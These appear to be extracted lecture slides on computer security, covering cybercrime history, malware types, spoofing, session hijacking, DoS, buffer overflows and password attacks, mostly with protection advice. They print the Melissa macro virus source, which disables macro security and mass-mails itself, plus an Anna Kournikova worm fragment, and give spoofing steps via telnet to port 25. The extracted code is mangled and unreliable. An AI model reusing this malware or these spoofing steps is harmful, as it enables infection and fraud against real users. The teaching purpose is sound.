Computer Security

1
Computer Security

• GSBA (Zurich) MIS Block
• Hacking

2
Topics

• Crisis
• Computer Crimes
• Hacker Attacks
• Modes of Computer Security
• Password Security
• Network Security
• Web Security
• Distributed Systems Security
• Database Security

3
Crisis

• Internet has grown very fast and security has
  lagged behind.
• Legions of hackers have emerged as impedance to
  entering the hackers club is low.
• It is hard to trace the perpetrator of cyber
  attacks since the real identities are camouflaged
• It is very hard to track down people because of
  the ubiquity of the network.
• Large scale failures of internet can have a
  catastrophic impact on the economy which relies
  heavily on electronic transactions

4
Computer Crime The Beginning

• In 1988 a "worm program" written by a college
  student shut down about 10 percent of computers
  connected to the Internet. This was the
  beginning of the era of cyber attacks.
• Today we have about 10,000 incidents of cyber
  attacks which are reported and the number is
  growing.

5
Computer Crime - 1994

• A 16-year-old music student called Richard Pryce,
  better known by the hacker alias Datastream
  Cowboy, is arrested and charged with breaking
  into hundreds of computers including those at the
  Griffiths Air Force base, Nasa and the Korean
  Atomic Research Institute. His online mentor,
  "Kuji", is never found.
• Also this year, a group directed by Russian
  hackers broke into the computers of Citibank and
  transferred more than 10 million from customers'
  accounts. Eventually, Citibank recovered all but
  400,000 of the pilfered money.

6
Computer Crime - 1995

• In February, Kevin Mitnick is arrested for a
  second time. He is charged with stealing 20,000
  credit card numbers. He eventually spends four
  years in jail and on his release his parole
  conditions demand that he avoid contact with
  computers and mobile phones.
• On November 15, Christopher Pile becomes the
  first person to be jailed for writing and
  distributing a computer virus. Mr Pile, who
  called himself the Black Baron, was sentenced to
  18 months in jail.
• The US General Accounting Office reveals that US
  Defense Department computers sustained 250,000
  attacks in 1995.

7
Computer Crime - 1999

• In March, the Melissa virus goes on the rampage
  and wreaks havoc with computers worldwide. After
  a short investigation, the FBI tracks down and
  arrests the writer of the virus, a 29-year-old
  New Jersey computer programmer, David L. Smith.
• More than 90 percent of large corporations and
  government agencies were the victims of computer
  security breaches in 1999

8
Computer Crime - 2000

• In February, some of the most popular websites in
  the world such as Amazon and Yahoo are almost
  overwhelmed by being flooded with bogus requests
  for data.
• In May, the ILOVEYOU virus is unleashed and clogs
  computers worldwide. Over the coming months,
  variants of the virus are released that manage to
  catch out companies that didn't do enough to
  protect themselves.
• In October, Microsoft admits that its corporate
  network has been hacked and source code for
  future Windows products has been seen.

9
Computer Crime - 2002

• In April 2002, computer hackers calling
  themselves Deceptive Duo announced that they
  had begun their mission of breaking into computer
  systems to call attention to the vulnerabilities
  in the US National Security
• In subsequent weeks they hacked into 52 web sites
  and databases including those operated by the US
  office of secretary of defense, the space and
  Naval Warfare Systems Command, The Defense
  Logistics Agency, Sandia National Lab, NASA JPL,
  Airlines, Banks

10
Intrusion Incident Reports
Note Projected from 3 quarters of data
11
Why are we vulnerable?

• Increased complexity of the systems
• Large networks with switches, hubs, gateways
  provide multiple entry points
• Very sophisticated software using millions of
  lines of code which leave holes for hackers to
  attack
• Constantly upgrading computer systems and
  software
• Support staff not able to keep up with security
  provisions
• New technology (often not fully tested) adds new
  risk
• Lack of proper education
• Managers do not realize the vulnerabilities and
  are not willing to invest in technology that does
  not directly effect the bottom line
• Dependence on commercial software with known
  vulnerabilities
• e.g. Microsoft Windows OS and Outlook

12
VIRUSES
13
Virus

• Computer viruses are self-replicating software
  entities that attach themselves parasitically to
  existing programs.
• The virus spreads by creating replica of itself
  and attaching itself to other executable programs
  to which it has write access.
• A true virus does not spread from machine to
  machine on its own. It must be passed on to other
  users via e-mail, infected files/diskettes,
  programs or shared files
• The viruses normally consist of two parts
• Replicator responsible for copying the virus to
  other executable programs.
• Payload Action of the virus,which may be benign
  such as printing a weird message, playing music
  or malicious such as destroying data or
  corrupting the hard disk.

14
Virus

• When a user executes an infected program (an
  executable file or boot sector), the viral
  portion of the code typically executes first and
  then the control returns to the original program,
  which executes normally.
• Unless the virus executes a payload which the
  user observes the user is not likely to find the
  virus operating on his/her hard drive.
• Viruses can persist in your programs for a long
  time without being detected thus constantly
  upgrading your virus signatures and running virus
  scans is very important.

15
Virus

• Polymorphic viruses
• Viruses which modify themselves prior to
  attaching themselves to another program.
• These are hard to detect since they are
  constantly changing their signature.
• Macro Viruses
• These viruses use an application macro language
  (such as VB or VBScript) to create programs that
  infect documents and templates
• If an infected document is opened the virus is
  executed and it infects the users application
  templates 

16
Melissa Virus
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\", "M
elissa?") "... by Kwyjibo" End If Set ADI1
ActiveDocument.VBProject.VBComponents.Item(1) Set
NTI1 NormalTemplate.VBProject.VBComponents.Item(
1) NTCL NTI1.CodeModule.CountOfLines ADCL
ADI1.CodeModule.CountOfLines BGN 2 If ADI1.Name
ltgt "Melissa" Then If ADCL gt 0 Then
_ ADI1.CodeModule.DeleteLines 1, ADCL Set
ToInfect ADI1 ADI1.Name "Melissa" DoAD
True End If If NTI1.Name ltgt "Melissa" Then If
NTCL gt 0 Then _ NTI1.CodeModule.DeleteLines 1,
NTCL Set ToInfect NTI1 NTI1.Name
"Melissa" DoNT True End If If DoNT ltgt True And
DoAD ltgt True Then GoTo CYA If DoNT True Then Do
While ADI1.CodeModule.Lines(1, 1)
"" ADI1.CodeModule.DeleteLines 1 Loop ToInfect.Cod
eModule.AddFromString ("Private Sub
Document_Close()") Do While ADI1.CodeModule.Lines(
BGN, 1) ltgt "" ToInfect.CodeModule.InsertLines
BGN, ADI1.CodeModule.Lines(BGN, 1) BGN BGN
1 Loop End If If DoAD True Then Do While
NTI1.CodeModule.Lines(1, 1) "" NTI1.CodeModule.D
eleteLines 1 Loop ToInfect.CodeModule.AddFromStrin
g ("Private Sub Document_Open()") Do While
NTI1.CodeModule.Lines(BGN, 1) ltgt
"" ToInfect.CodeModule.InsertLines BGN,
NTI1.CodeModule.Lines(BGN, 1) BGN BGN
1 Loop End If CYA If NTCL ltgt 0 And ADCL 0 And
(InStr(1, ActiveDocument.Name, "Document")
False) Then ActiveDocument.SaveAs
FileNameActiveDocument.FullName ElseIf
(InStr(1, ActiveDocument.Name, "Document") ltgt
False) Then ActiveDocument.Saved True End
If 'WORD/Melissa written by Kwyjibo 'Works in
both Word 2000 and Word 97 'Worm? Macro Virus?
Word 97 Virus? Word 2000 Virus? You Decide! 'Word
-gt Email Word 97 lt--gt Word 2000 ... it's a new
age! If Day(Now) Minute(Now) Then
Selection.TypeText " Twenty-two points,
plus triple-word-score, plus fifty points for
using all my letters. Game's over. I'm outta
here." End Sub
// Melissa Virus Source Code Private Sub
Document_Open() On Error Resume Next If
System.PrivateProfileString("", "HKEY_CURRENT_USER
\Software\Microsoft\Office\9.0\Word\Security",
"Level") ltgt "" Then CommandBars("Macro").Controls(
"Security...").Enabled False System.PrivateProfi
leString("", "HKEY_CURRENT_USER\Software\Microsoft
\Office\9.0\Word\Security", "Level")
1 Else CommandBars("Tools").Controls("Macro").Ena
bled False Options.ConfirmConversions (1 -
1) Options.VirusProtection (1 -
1) Options.SaveNormalPrompt (1 - 1) End If Dim
UngaDasOutlook, DasMapiName, BreakUmOffASlice Set
UngaDasOutlook CreateObject("Outlook.Application
") Set DasMapiName UngaDasOutlook.GetNameSpace("
MAPI") If System.PrivateProfileString("", "HKEY_CU
RRENT_USER\Software\Microsoft\Office\",
"Melissa?") ltgt "... by Kwyjibo" Then If
UngaDasOutlook "Outlook" Then DasMapiName.Logon
"profile", "password" For y 1 To
DasMapiName.AddressLists.Count Set
AddyBook DasMapiName.AddressLists(y) x
1 Set BreakUmOffASlice
UngaDasOutlook.CreateItem(0) For oo 1
To AddyBook.AddressEntries.Count Peep
AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x x 1 If x gt 50 Then oo
AddyBook.AddressEntries.Count Next oo
BreakUmOffASlice.Subject "Important
Message From " Application.UserName
BreakUmOffASlice.Body "Here is that document
you asked for ... don't show anyone else -)"
BreakUmOffASlice.Attachments.Add
ActiveDocument.FullName
BreakUmOffASlice.Send Peep "" Next
y DasMapiName.Logoff End If
17
Worms

• Worms are a form of self-replicating programs
  that can automatically spread.
• Unlike the viruses they do not need a carrier
  program and they replicate by spawning copies of
  themselves.
• They are more complex and are much harder to
  write than the virus programs.
• ILOVEYOU worm in 2000 automatically emailed
  itself to the first 200 entries in the outlook
  address book
• The worm spread to 10 million computers in two
  days which were required to create a patch for it
• It cost billions of dollars to repair the damage
• Sometimes worms take a long time to spread
• Anna Kournikova worm was discovered in August
  2000 and became a serious threat in February 2001
• CodeRed, Nimbda, SirCam are other worms each of
  which cost upwards of 500 million dollars in
  damages

18
Worm (Anna Kournikova)

• 'Vbs.OnTheFly Created By OnTheFly
• On Error Resume Next
• Set WScriptShell CreateObject("WScript.Shell")
• WScriptShell.regwrite "HKCU\software\OnTheFly\",
  "Worm made with Vbswg 1.50b"
• Set FileSystemObject Createobject("scripting.fil
  esystemobject")
• FileSystemObject.copyfile wscript.scriptfullname,F
  ileSystemObject.GetSpecialFolder(0)
  "\AnnaKournikova.jpg.vbs"
• if WScriptShell.regread ("HKCU\software\OnTheFly\m
  ailed") ltgt "1" then
• doMail()
• end if
• if month(now) 1 and day(now) 26 then
• WScriptShell.run "Http//www.dynabyte.nl",3,false
  
• end if
• Set thisScript FileSystemObject.opentextfile(wsc
  ript.scriptfullname, 1)
• thisScriptText thisScript.readall

19
Trojan Horse

• This is a program that secretly gets installed on
  a computer planting a secret payload that can
  allow a hacker who planted it access to do things
  such as stealing passwords or recording key
  strokes and transmitting them to a third party
• A logic bomb is a trojan horse that executes when
  certain conditions become true
• Most commonly executes at a specific date and
  time
• Example Cute Trojan Horse allows hackers to
  destroy the firewalls installed on computers.

20
HACKERS
21
Why do Hackers Attack?

• Most hackers try to test the system limitations
  out of intellectual curiosity bragging rights
• Cyber criminals hack into corporate computers to
  steal money or credit card numbers
• In March 2001 FBI reported that over 1 million
  credit card numbers were stolen by cyber
  criminals in Russia Ukraine
• Cyber terrorists try to push their political
  agenda by coercion via computer-based attacks
  against computers and networks
• NATO computers were blasted with infected emails
  to protest against bombings in Kosovo during the
  1999 conflict
• Lucent was made target for DOS attacks by a group
  protesting against its business with Israel
• Disgruntled employees often venting anger at a
  company or organization by hacking stealing
  information or causing damage to computer systems

22
Types of Hacker Attack

• Active Attacks
• Denial of Service
• Breaking into a site
• Intelligence Gathering
• Resource Usage
• Deception
• Passive Attacks
• Sniffing
• Passwords
• Network Traffic
• Sensitive Information
• Information Gathering

23
Modes of Hacker Attack

• Spoofing
• Session Hijacking
• Denial of Service Attacks
• Buffer Overflow Attacks
• Password Attacks

24
Spoofing

• Definition
• An attacker alters his identity so that some one
  thinks he is some one else
• Email, User ID, IP Address,
• Attacker exploits trust relation between user and
  networked machines to gain access to machines
• Types of Spoofing
• IP Spoofing
• Email Spoofing
• Web Spoofing

25
IP Spoofing

• There are three basic flavors of IP spoofing
  attacks
• Basic Address Change
• Use of source routing to intercept packets
• Exploiting of a trust relationship on UNIX
  machines

26
IP Spoofing Basic Address Change

• Definition
• Attacker uses IP address of another computer to
  acquire information or gain access

Replies sent back to 10.10.20.30
Spoofed Address 10.10.20.30
John 10.10.5.5
From Address 10.10.20.30 To Address 10.10.5.5

• Attacker changes his own IP address to spoofed
  address
• Attacker can send messages to a machine
  masquerading as spoofed machine
• Attacker can not receive messages from that
  machine

Attacker 10.10.50.50
27
Basic Address Change (Windows)

• Simple Mechanism
• From start menu select settings ? Control Panel
• Double click on the network icon
• Right click the LAN connection and select
  properties
• select Internet Protocol (TCP/IP) and click on
  properties
• Change the IP address to the address you want to
  spoof
• Reboot the machine
• All packets sent from the machine have the
  spoofed address

28
Basic Address Change (Unix)

• Use ifconfig command
• Write Details

29
IP-Spoofing (Basic Address Change)

• Limitation
• Flying Blind Attack i.e. user can not get return
  messages
• Any protocol which requires 3-way connection can
  not be used
• UDP which is connectionless can be used to send
  packets
• Uses
• Used in denial-of-service attack where a single
  packet can crash a machine

30
IP Spoofing Basic Address Change

• Prevention
• You can protect your machines from being used to
  launch a spoofing attack
• You can do little to prevent other people from
  spoofing your address
• Users can be prevented from having access to
  network configuration
• To protect your company from spoofing attack you
  can apply basic filters at your routers
• Ingress Filtering Prevent packets from outside
  coming in with address from inside.
• Egress Filtering Prevents packets not having an
  internal address from leaving the network

31
IP Spoofing Source Routing

• Definition
• Attacker spoofs the address of another machine
  and inserts itself between the attacked machine
  and the spoofed machine to intercept replies

Attacker intercepts packets as they go to
10.10.20.30
From Address 10.10.20.30 To Address 10.10.5.5
Replies sent back to 10.10.20.30
Spoofed Address 10.10.20.30
John 10.10.5.5
Attacker 10.10.50.50

• The path a packet may change can vary over time

32
IP Spoofing Source Routing Contd.

• Attacker uses source routing to ensure that the
  packets pass through certain nodes on the network
• Loose Source Routing (LSR) The sender specifies
  a list of addresses that the packet must go
  through but it can go to any other address if it
  needs to.
• Strict Source Routing (SSR) The sender specifies
  the exact path for the packet and the packet is
  dropped if the exact path can not be taken.
• Source Routing works by using a 39-byte source
  route option field in the IP header
• Works by picking one node address at a time
  sequentially
• A maximum of 9 nodes in the path can be specified
• Source Routing was introduced into the TCP spec
  for debugging and testing redundancy in the
  network

33
IP Spoofing Source Routing contd.

• Tracert Windows NT utility runs at a Command
  prompt.
• Traces a path from your machine to the URL or IP
  address given along with the tracert command.
• Usage
• tracert -d -h maximum_hops -j host-list -w
  timeout target_name
• Options
• -d Do not resolve addresses to
  hostnames.
• -h maximum_hops Maximum number of hops to
  search for target.
• -j host-list Loose source route along
  host-list.
• -w timeout Wait timeout milliseconds for
  each reply.
• Tracing a URL tracert www.techadvice.com ltentergt
• Tracing route to www.techadvice.com
  63.69.55.237over a maximum of 30 hops1 181
  ms 160 ms 170 ms border0.Srvf.Rx2.abc
  63.69.55.2372 170 ms 170 ms 160 ms
  192.168.0.23 .....

34
IP Spoofing Source Routing contd.

• Tracing an IP-Address tracert 3.1.6.62
• Tracing using loose source routing tracert j
  3.2.1.44 3.3.1.42
• Protection
• Disable source routing at your routers

35
IP Spoofing Trust Relationships

• In UNIX trust relationships can be set up between
  multiple machines
• After trust becomes established the user can use
  Unix r commands to access sources on different
  machines
• A .rhosts file is set up on individual machines
  or /etc/hosts.equiv is used to set it up at the
  system level
• Trust relationship is easy to spoof
• If user realizes that a machine trusts the IP
  address 10.10.10.5 he can spoof that address and
  he is allowed access without password
• The responses go back to the spoofed machine so
  this is still a flying blind attack.
• Protection
• Do not use trust relations
• Do not allow trust relationships on the internet
  and limit them within the company
• Monitor which machines and users can have trust
  without jeopardizing critical data or function

36
Email Spoofing

• Definition
• Attacker sends messages masquerading as some one
  else
• What can be the repercussions?
• Reasons
• Attackers want to hide their identity while
  sending messages (sending anonymous emails)
• User sends email to anonymous e-mailer which
  sends emails to the intended recipient
• Attacker wants to impersonate someone
• To get someone in trouble
• Social engineering
• Get information by pretending to be someone else

37
Email Spoofing Similar Name Account

• Create an account with similar email address
• SanjayGoel_at_yahoo.com A message from this account
  can perplex the students
• Most mailers have an alias field (this can be
  used to prescribe any name.
• Example
• Class
• I am too sick to come to the class tomorrow so
  the class is cancelled.
• The assignments that were due are now due next
  week.
• Sanjay Goel

38
Email Spoofing Similar Name Account

• Protection
• Educating the employees in a corporation to be
  cautious
• Make sure that the full email address rather than
  alias is displayed
• Institute policy that all official communication
  be done using company email
• Use PKI where digital signature of each employee
  is associated with the email

39
Email Spoofing Mail Client

• Modify a mail client
• When email is sent from the user no
  authentication is performed on the from address
• Attacker can put in any return address he wants
  to in the mail he sends
• Protection
• Education
• Audit Logging
• Looking at the full email address

40
Email Spoofing Telnet to Port 25

• Telnet to port 25
• Most mail servers use port 25 for SMTP.
• An attacker runs a port scan and gets the IP
  address of machine with port 25 open
• telnet ip-adress 25 (cmd to telnet to port 25)
• Attacker logs on to this port and composes a
  message for the user.
• Example
• Hello
• mail fromspoofed-email-address
• Rcpt to person-sending-mail-to
• Data (message you want to send)
• Period sign at the end of the message

41
Email Spoofing Telnet to Port 25

• Mail relaying is the sending of email to a person
  on a different domain
• Protection
• Make sure that the recipients domain is the same
  as the the mail server
• New SMTP servers disallow mail relaying
• From a remote connection the from and to
  addresses are from the same domain as the mail
  server
• Make sure that spoofing and relay filters are
  configured

42
Web Spoofing

• Basic
• Man-in-the-Middle Attack
• URL Rewriting
• Tracking State

43
Web Spoofing - Basic

• No requirement against registering a domain
• Attacker registers a web address matching an
  entity e.g. votebush.com, geproducts.com,
  gesucks.com
• Process
• Hacker sets up a spoofed site
• User goes to the spoofed site
• Clicks on items to order and checks out
• Site prompts user for credit card information
• Gives the user a cookie
• Puts message Site experiencing technical
  difficulty
• When user tries back spoofed site checks cookie
• Already has credit card number so directs the
  user to legitimate site

44
Web Spoofing - Basic

• Protection
• Use server side certificates
• Certificates much harder to spoof
• Users need to ensure that the certificates are
  legitimate before clicking on OK to accept
  certificate

45
Web Spoofing Man in the Middle Attack

• Man-in-the-Middle Attack
• Attacker acts as a proxy between the web server
  and the client
• Attacker has to compromise the router or a node
  through which the relevant traffic flows
• Protection
• Secure the perimeter to prevent compromise of
  routers

46
Web Spoofing URL Rewriting

• URL Rewriting
• Attacker redirects web traffic to another site
  that is controlled by the attacker
• Attacker writes his own web site address before
  the legitimate link
• e.g. ltA hrefhttp//www.hacker.com/http//www.alb
  any.edu/index.htmlgt
• The user is first directed to the hacker site and
  then redirected to the actual site
• Protections
• Web browsers should be configured to always show
  complete address
• Ensure that the code for the web sites is
  properly protected at the server end and during
  transit

47
Web Spoofing

• Tracking State
• When a user logs on to a site a persistent
  authentication is maintained
• This authentication can be stolen for
  masquerading as the user

48
Tracking State

• Browsers primarily use Http protocol to
  communicate
• Http is a stateless protocol
• Web Sites need to maintain persistent
  authentication so that user does not have to
  authenticate repeatedly
• This authentication can be stolen for
  masquerading as the user

49
Web Spoofing Tracking State

• Three types of tracking methods are used
• Cookies Line of text with ID on the users cookie
  file
• Attacker can read the ID from users cookie file
• URL Session Tracking An id is appended to all
  the links in the website web pages.
• Attacker can guess or read this id and masquerade
  as user
• Hidden Form Elements
• ID is hidden in form elements which are not
  visible to user
• Hacker can modify these to masquerade as another
  user

50
Web Spoofing Tracking State Cookies

• Cookies are a piece of information that the
  server passes to the browser and the browser
  stores on the server
• Set of name value pairs
• Web servers place cookies on user machines with
  id to track the users
• Two types of cookies
• Persistent cookies Stored on hard drive in text
  format
• Non-persistent cookies Stored in memory and goes
  away after you reboot or turn off the machine
• Attacker gets cookies by
• Accessing the victim hard drive
• Guessing Ids which different web servers assign

51
Web Spoofing Tracking State Cookies

• Protection
• Physical protection of hard drives is best
  protection
• Use non-persistent cookies since hacker has to
  access and edit memory to get to it.
• Use random, hard to guess ID

52
Web Spoofing Tracking State URL Encoding

• http// www.address.edu1234/path/subdir/file.ext?
  query_string
• Service ? http
• Host ? www. Address. edu
• Port ? 1234
• /path/subdur/file.ext ? resource path on the
  server
• query_string ? additional information that can
  be passed to resource
• Http allows name value pairs to be passed to the
  resource
• http// www. test. edu/index.jsp?firstnamesanjay
  lastnamegoel
• The server can place the id of a customer along
  with the URL
• http//www.fake.com/ordering/id928932888329938.82
  3948
• This number can be obtained by guessing or
  looking over some ones shoulder
• Timeout for the sessions may be a few hours
• User can masquerade as the owner of the id and
  transact on the web

53
Web Spoofing URL Encoding Protection

• Server Side
• Use large, hard to guess identifiers
• Keep the session inactivity time low
• User Side
• Make sure that no one is looking over your
  shoulder as you browse
• Do not leave terminals unattended
• Use server side certificates
• A server side certificate is a certificate that
  the server presents to a client to prove identity
• Users should verify the certificates prior to
  clicking OK on the accept button

54
Web Spoofing Tracking State Cookies

• HTML allows creation of hidden fields in the
  forms
• Developers exploit this to store information for
  their reference
• ID can be stored as a hidden form field
• ltInput TypeHidden NameSearch Valuekeygt
• ltInput TypeHidden Nameid Value123429823gt
• Protection
• Hard to guess ids
• Short expiry times

55
Web Spoofing General Protection

• Disable JavaScript, ActiveX and other scripting
  languages that execute locally or in the browser
• Make sure that the browsers location line is
  always visible
• Educate the users
• Make hard to guess session ids
• Use server side certificates
• A server side certificate is a certificate that
  the server presents to a client to prove identity
• Users should verify the certificates prior to
  clicking OK on the accept button

56
Session Hijacking

• Definition
• Process of taking over an existing active session
• Modus Operandi
• User makes a connection to the server by
  authenticating using his user ID and password.
• After the users authenticate, they have access to
  the server as long as the session lasts.
• Hacker takes the user offline by denial of
  service
• Hacker gains access to the user by impersonating
  the user

57
Session Hijacking
Bob telnets to Server
Bob authenticates to Server
Server
Bob
Die!
Hi! I am Bob
Attacker

• Attacker can
• monitor the session
• periodically inject commands into session
• launch passive and active attacks from the session

58
Session Hijacking How Does it Work?

• Attackers exploit sequence numbers to hijack
  sessions
• Sequence numbers are 32-bit counters used to
• tell receiving machines the correct order of
  packets
• Tell sender which packets are received and which
  are lost
• Receiver and Sender have their own sequence
  numbers
• When two parties communicate the following are
  needed
• IP addresses
• Port Numbers
• Sequence Number
• IP addresses and port numbers are easily
  available so once the attacker gets the server to
  accept his guessed sequence numbers he can hijack
  the session.

59
Session Hijacking Programs

• Juggernaut
• Network sniffer that that can also be used for
  hijacking
• Get from http//packetstorm.securify.com
• Hunt
• Can be use to listen, intercept and hijack active
  sessions on a network
• http//lin.fsid.cvut.cz/kra/index.html
• TTY Watcher
• Freeware program to monitor and hijack sessions
  on a single host
• http//www.cerias.purdue.edu
• IP Watcher
• Commercial session hijacking tool based on TTY
  Watcher
• http//www.engrade.com

60
Session Hijacking Protection

• Use Encryption
• Prevents hacker from intercepting packets
• Use a secure protocol for sensitive work
• E.g. administering remote machines
• Limit incoming connections
• Minimize remote access
• Strong authentication ineffective
• Since the authentication is only done at
  beginning of the session

61
Denial of Service (DOS) Attack

• Definition
• Attack through which a person can render a system
  unusable or significantly slow down the system
  for legitimate users by overloading the system so
  that no one else can use it.
• Types
• Crashing the system or network
• Send the victim data or packets which will cause
  system to crash or reboot.
• Exhausting the resources by flooding the system
  or network with information
• Since all resources are exhausted others are
  denied access to the resources
• Distributed DOS attacks are coordinated denial of
  service attacks involving several people and/or
  machines to launch attacks

62
Denial of Service (DOS) Attack

• Types
• Ping of Death
• SSPing
• Land
• Smurf
• SYN Flood
• CPU Hog
• Win Nuke
• RPC Locator
• Jolt2
• Bubonic
• Microsoft Incomplete TCP/IP Packet Vulnerability
• HP Openview Node Manager SNMP DOS Vulnerability
• Netscreen Firewall DOS Vulnerability
• Checkpoint Firewall DOS Vulnerability

63
DOS Attack - Protection

• Effective robust design
• Create redundant servers
• Distribute your servers across different ISPs
• Bandwidth limitations
• Limit available band width based on protocol
• Keep systems patched
• Prevents attacks where machines are crashed
• Run the least amount of services
• Limits the options of the hacker
• Allow only necessary traffic
• Prevents hacked machines to be used as launching
  pads
• Block IP addresses
• Once under attack start blocking IP-addresses at
  the firewall

64
Buffer Overflow Attacks

• This attack takes advantage of the way in which
  information is stored by computer programs
• An attacker tries to store more information on
  the stack than the size of the buffer
• How does it work?

65
Buffer Overflow Attacks

• Programs which do not have a rigorous memory
  check in the code, are vulnerable to this attack
• Simple weaknesses can be exploited
• If memory allocated for name is 50 characters,
  someone can break the system by sending a
  fictitious name of more than 50 characters
• Can be used for espionage, denial of service or
  compromising the integrity of the data
• Examples
• NetMeeting Buffer Overflow
• Outlook Buffer Overflow
• AOL Instant Messenger Buffer Overflow
• SQL Server 2000 Extended Stored Procedure Buffer
  Overflow

66
Buffer Overflow Attacks - Prevention

• Close port or service
• Remove vulnerable software
• Remove software no longer being used
• Apply vendor patch
• Update patches as soon as the vendor releases it
• Filter specific traffic at the firewall
• Once application is identified stop all requests
  to it
• Test Key Applications
• Test software for vulnerabilities
• Run software in the least privilege required
• Limits the exploitation capacity of the hacker

67
Password Attacks

• A hacker can exploit a weak passwords
  uncontrolled network modems easily
• Steps
• Hacker gets the phone number of a company
• Hacker runs war dialer program
• If original number is 555-5532 he runs all
  numbers in the 555-55xx range
• When modem answers he records the phone number of
  modem
• Hacker now needs a user id and password to enter
  company network
• Companies often have default accounts e.g. temp,
  anonymous with no password
• Often the root account uses company name as the
  password
• For strong passwords password cracking techniques
  exist

68
Password Security
Client
Server
Hash Function
Hashed Password
Compare Password
Hashed Password
Password
Salt
Stored Password
Allow/Deny Access

• Password hashed and stored
• Salt is added to randomize the password and then
  stored on the system
• Password attacks launched to crack encrypted
  password

69
Password Attacks - Process

• Find a valid user ID
• Create a list of possible passwords
• Rank the passwords from high probability to low
• Type in each password
• If the system allows you in success !
• If not, try again, being careful not to exceed
  password lockout (the number of times you can
  guess a wrong password before the system shuts
  down and wont let you try any more)

70
Password Attacks - Types

• Dictionary Attack
• Hacker tries all words in dictionary to crack
  password
• 70 of the people use dictionary words as
  passwords
• Brute Force Attack
• Try all permutations of the letters symbols in
  the alphabet
• Hybrid Attack
• Words from dictionary and their variations used
  in attack
• Social Engineering
• People write passwords in different places
• People disclose passwords naively to others
• Shoulder Surfing
• Hackers slyly watch over peoples shoulders to
  steal passwords
• Dumpster Diving
• People dump their trash papers in garbage which
  may contain information to crack passwords

71
Conclusions

• Computer Security is a continuous battle
• As computer security gets tighter hackers are
  getting smarter
• Very high stakes
• Billions of dollars worth of business conducted
  on the internet